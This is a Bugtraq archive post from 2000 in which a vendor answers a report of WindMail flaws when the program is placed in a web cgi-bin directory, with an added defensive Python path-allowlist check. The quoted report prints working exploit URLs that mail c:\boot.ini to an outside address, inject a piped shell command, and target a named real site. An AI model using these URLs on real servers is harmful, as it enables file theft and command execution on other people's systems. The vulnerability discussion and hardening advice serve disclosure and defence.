Bugtraq mailing list archives

Re: Windmail allow web user get any file


From: benc () GEOCEL COM (Ben Camp)
Date: Fri, 31 Mar 2000 11:43:25 -0600


In response to the following message:

Date: Sat, 25 Mar 2000 22:41:46 -0000
From: Frankie Zie <frankie () CNNS NET>
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Windmail allow web user get any file

I found some vulnerabilities if windmail runs as a CGI
application. Tested on WindowsNT 4.0, Windmail 3.05
successfully.
WindMail is a 32-bit Windows console program by geocel that
gives you command-line e-mail messaging capability.
You can download an evaluation copy of WindMail 3.0 at:
http://www.geocel.com/download/wmail301e.exe

WindMail has a feature that allows mailing HTML form results
from CGI scripts.
I found windmail doesn't check either the attachment file or
special characters in parameters, that allows you to execute
arbitrary commands which the web user can do:
http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
20yourmail () mail com%20|%20dir%20c:\
After the request, windmail will send c:\boot.ini to
yourmail () mail com and execute "dir c:\" command.

For example:
http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%
20chinahack () 163 net
After a while, check chinahack () 163 net, I got a copy of
boot.ini from www.metro.net

pp () cnns net
http://www.cnns.net


There are two issues presented here, and since they're unrelated I'll
approach them separately.  First is a reported pipe vulnerability, then a
remote file send vulnerability.

1. REPORTED PIPE VULNERABILITY.  I tried this a variety of ways, and even
with other executables.  IF this exists at all (I could not duplicate the
execution of anything) it is most likely a GAPING IIS hole.  Piping happens
at the command interpreter level (before windmail is ever handed its
portion of the command line).  I tried a variety of methods to do this w/
his instructions (posted and sent to me previously) and have had zero luck.
 Additionally, because of the way IIS creates CGIs w/o real STDIO handles I
seriously doubt that this is possible.  If someone can demonstrate
otherwise I'm very interested.  This bug was removed from
SECURITYFOCUS.COM for these reasons (irreproducible / not WindMail related).

Here is the final URL I was testing on:
http://localhost/windmail.exe?%20-n%20c:\boot.ini%20benc () geocel com%20|%20c:
\winnt\system32\cdplayer.exe

This did not produce an instance of CDPLAYER.EXE at all.  Even with the
zero-security model pp () cnns net is testing under.  This was tested for non
executable command shell commands (like dir) as well as other command line
apps.  I tested this with windmail.exe, cscript.exe, cdplayer.exe to name a
few.  In the above example CDPLAYER.EXE should start as a hung process.  It
never starts and never gets hung.

So I can say with reasonable certainty, after performing several tests and
consulting with others, that this bug report is purely misinformational.

2. REMOTE FILE SEND VULNERABILITY

First let me say this, because it has already been MISREPORTED in SANS
Digest.  WindMail is NOT a CGI program.  WindMail is NOT to be placed in
your CGI-BIN directory.  This has been re-categorized on SECURITYFOCUS.COM
as a configuration error.

Just as you would not copy AT.EXE, CACLS.EXE, NET.EXE, NBTSTAT.EXE, etc.
to your CGI-BIN, do not copy WINDMAIL.EXE to your CGI-BIN.

Also, do not run your webserver as Administrator.  WindMail is a command
line mailer designed to work under the context of whoever is using it.
Just as it would be bad to copy /bin/rm to your cgi-bin and run your HTTPD as
root, it would be wrong to say this is a problem with WindMail.  This is
essentially a server configuration problem which makes any functional
program which accepts command line arguments (and was copied to a world
executable directory like cgi-bin) exploitable to some degree.

So, in a server configuration where the Web server is running as
Administrator or the "System" account and where an administrator had
against the recommendations of the documentation and example scripts copied
WINDMAIL.EXE to their CGI-BIN there exists a vulnerability where any remote
user can, with the access they've been granted in the configuration,  send
any file as an attachment.  If the server is running as Domain
Administrator (or any other trusted network user), remote users will also
likely be able to email remote files with UNC paths (\\server\share\file).

SUGGESTED USAGE:

1. Do not copy WINDMAIL.EXE to the CGI-BIN directory.  Grant the
appropriate rights to the WINDMAIL directory so that CGIs called from your
web server can call WINDMAIL from its own directory.

2. Do not change the default user context which your webserver runs under
(IUSR_SERVERNAME by default on IIS) if you do not understand the security
implications.  On IIS the permissions are rather strict by default.

3. Do not grant Execute access to directories that do not need it.  This is
just opening your server up to potential problems.

OTHER SUGGESTIONS:
Some users have requested that we add a constraint for which
directories files can be attached from.  This will be implemented in the
next version and will be set in the main configuration file.  Please send
any other suggestions or questions/comments/complaints to me directly at
benc () geocel com.  If you would like to be notified of updates/releases for
WindMail and our other products email sales () geocel com.

For the record, pp () cnns net has decided not to respond to my inquiries for
more information.  If he has some more information on the alleged PIPE
VULNERABILITY the implications are pretty large and I'd like to see it.

Thanks,

Ben Camp
benc () geocel com
Geocel International
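
An added example, not part of the original message and not Geocel's implementation: one way a command-line mailer could enforce the attachment-directory constraint mentioned under OTHER SUGGESTIONS, rejecting the c:\boot.ini and UNC (\\server\share\file) cases described above. The allowlisted directory C:\WindMail\outbox and the function names are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any platform

# Hypothetical allowlist; the message does not say how the real setting will look.
ALLOWED_ATTACH_DIRS = [r"C:\WindMail\outbox"]


def _canon(path):
    """Lexically normalize a Windows path: collapse '..', unify slashes and case."""
    return ntpath.normcase(ntpath.normpath(path))


def is_attachment_allowed(requested, allowed_dirs=ALLOWED_ATTACH_DIRS):
    """Return True only if `requested` names a file inside an allowed directory."""
    if not requested or "\x00" in requested:
        return False
    # UNC and device paths (\\server\share\file, \\?\C:\...) are never local files.
    if requested.replace("/", "\\").startswith("\\\\"):
        return False
    drive, rest = ntpath.splitdrive(requested)
    # Require a fully qualified path: rejects 'boot.ini', '\boot.ini', 'C:boot.ini'.
    if not drive or not rest.startswith(("\\", "/")):
        return False
    # A colon after the drive letter would name an NTFS alternate data stream.
    if ":" in rest:
        return False
    target = _canon(requested)
    for base in allowed_dirs:
        base_c = _canon(base)
        try:
            # commonpath compares whole components, so 'outbox2' does not
            # pass as a child of 'outbox' the way a string prefix test would.
            inside = ntpath.commonpath([base_c, target]) == base_c
        except ValueError:  # different drives
            continue
        if inside and target != base_c:
            return True
    return False


if __name__ == "__main__":
    # Constructed sample inputs.
    for p in (r"C:\WindMail\outbox\report.txt", r"c:\boot.ini",
              r"C:\WindMail\outbox\..\..\boot.ini", r"\\server\share\file"):
        print(p, "->", "allow" if is_attachment_allowed(p) else "deny")
```

The check is lexical only: it does not resolve junctions, symbolic links or 8.3 short names, so a deployment would also compare the resolved path and keep the filesystem ACLs for the web server account restrictive.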

